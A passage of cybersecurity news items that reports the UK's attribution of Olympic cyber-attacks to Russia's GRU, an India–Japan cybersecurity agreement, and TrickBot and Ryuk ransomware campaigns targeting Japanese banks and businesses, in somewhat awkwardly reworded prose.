“We would not be able to overlook an ill-intentioned cyber-attack that could undermine the foundation of democracy,” Kato stated, including that Japanese authorities were gathering data and would keep on imparting it to other countries. 

The UK government announced with what it reported with 95% certainty that the disruption of both the winter and summer Olympics was carried out distantly by the GRU unit 74455. 

In PyeongChang as well, as indicated by the UK, the GRU's cyber unit endeavored to camouflage itself as North Korean and Chinese hackers when it focused on the opening ceremony of the 2018 winter Games, smashing the site to stop spectators from printing out tickets and crashing the WiFi in the arena. 

The key targets additionally included broadcasters, a ski resort, Olympic officials, services providers, and sponsors of the games in 2018, which means the objects of the attacks were not simply in Korea.

The foreign secretary, Dominic Raab, stated: “The GRU’s actions against the Olympic and Paralympic Games are cynical and reckless. We condemn them in the strongest possible terms.” 

Included later that, “the UK will continue to work with our allies to call out and counter future malicious cyber-attacks.” 

These allegations of the UK are believed to be a part of an endeavor to disrupt Russia's cybersecurity threat through maximum exposure and stop any interruption of a rescheduled summer Games next year.

India And Japan Agree on The Need for Robust and Resilient Digital and Cyber Systems

 

India and Japan finalize a cybersecurity deal as both agreed to the need for vigorous and 'resilient digital and cyber systems'. 

Their ambitious agreement accommodates participation in 5G technology, AI and a variety of other critical regions as the two strategic partners pledged to broad base their ties including in the Indo-Pacific area. 

The foreign ministers of the two nations – S Jaishankar of India and Motegi Toshimitsu of Japan – were of the view that a free, open, and comprehensive Indo-Pacific region “must be premised on diversified and resilient supply chains."

The two ministers “welcomed the Supply Chain Resilience Initiative between India, Japan, Australia, and other like-minded countries." 

Their initiative comes with regards to nations hoping to enhance supply chains out of China subsequent to Beijing suddenly closing factories and units in the repercussions of the Coronavirus pandemic, sending economic activities into a dump. 

The move hurled the subject of dependability of supply chains situated in China with nations hoping to widen the hotspots for critical procurement. In September, the trade ministers of India, Australia, and Japan had consented upon to dispatch an initiative on supply chain resilience.


Jaishankar, in a tweet, said further expansion of India-Japan cooperation in third nations centering around development projects likewise figured in the thirteenth India-Japan foreign minister's strategic dialogue.

The two “welcomed the finalization of the text of the cybersecurity agreement. The agreement promotes cooperation in capacity building, research, and development, security and resilience in the areas of Critical Information Infrastructure, 5G, Internet of Things (IoT), Artificial Intelligence (AI), among others," the statement said. 

In New Delhi, the agreement was cleared at a Cabinet meeting headed by PM Narendra Modi, as per Information and Broadcasting Minister Prakash Javadekar. 

The ministers concurred that the following annual bilateral summit between the leaders of India and Japan would be facilitated by the Indian government “at a mutually convenient time for the two Prime Ministers."

Alert! TrickBot Trojan and Ryuk Ransomware spreads through Japan, as the holiday season approaches


The most dangerous and active banking trojan family according to IBM X-Force data, TrickBot has been modifying it's malware’s modules lately, as the threat group launches in the wild. As the infection campaign spreads around the globe - Japan has become its new growing target ahead of the holiday season. Just ahead of the holiday's TrickBot campaigns usually target European and western countries and other parts of the world but this is the first time they have focused on Japan.


And also, just in time for the holidays when they'll be shopping extensively. Thus, the Japanese consumers should be wary of these infections as they target banks, online shopping payment cards, telecommerce, a bitcoin exchange, e-wallets, and others. TrickBot has been loaded with hundreds of targeted URLs belonging to banks and other retailers. Emotet botnet is also dropping TrickBot to other devices.

The most common attack includes web injections on bank websites leading to banking frauds. On-the-fly injections, used by TrickBot lures the victim into revealing personally identifiable information (PII), payment card details and PIN codes. This is not the first time Eastern European gangs attacked the country, other trojans like URLZone and Gozi (Ursnif) have been prevalent in Japan for years now. For Japanese Businessmen - Beware! Not only TrickBot but Ryuk Ransomware is also spreading through the region TrickBot, being already a worrisome banking plague is not only limited to that.

The Japanese companies should also be wary of the growing ransomware attacks because the TrickBot can usher in Ryuk Ransomware Attacks along with it. It's a kill chain that starts with Emotet and TrickBot and leads to Ryuk attack, ransomware that locks the system demanding millions of dollars. If such Ryuk or TrickBot attack is suspected, then you should immediately launch response plans and contain the infection or contact security companies without wasting precious time as these infections spread fast and wide.